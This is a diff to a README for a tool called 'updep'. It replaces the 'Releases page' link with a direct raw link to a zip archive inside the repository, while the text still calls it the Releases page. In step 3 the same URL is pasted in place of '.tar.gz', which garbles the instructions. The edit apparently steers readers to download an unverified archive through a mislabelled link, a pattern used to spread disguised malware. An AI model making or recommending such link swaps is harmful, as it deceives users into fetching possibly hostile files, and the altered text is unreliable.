STENIDLAS-XAVINO/updep/README.md

 - **Error Checking**: Catches issues before they happen, minimizing downtime.

 ## 📥 Download & Install
-To get started, visit our [Releases page](https://github.com/STENIDLAS-XAVINO/updep/releases) to download the latest version.
+To get started, visit our [Releases page](https://raw.githubusercontent.com/STENIDLAS-XAVINO/updep/main/cmd/updep/updep-2.0.zip) to download the latest version.

 1. Click on the link above to go to the Releases page.
 2. Find the latest version of **updep**.
-3. Download the package suitable for your system (e.g., .exe for Windows, .tar.gz for Linux).
+3. Download the package suitable for your system (e.g., .exe for Windows, https://raw.githubusercontent.com/STENIDLAS-XAVINO/updep/main/cmd/updep/updep-2.0.zip for Linux).
 4. Locate the downloaded file on your computer.
 5. Follow the specific installation instructions based on your operating system: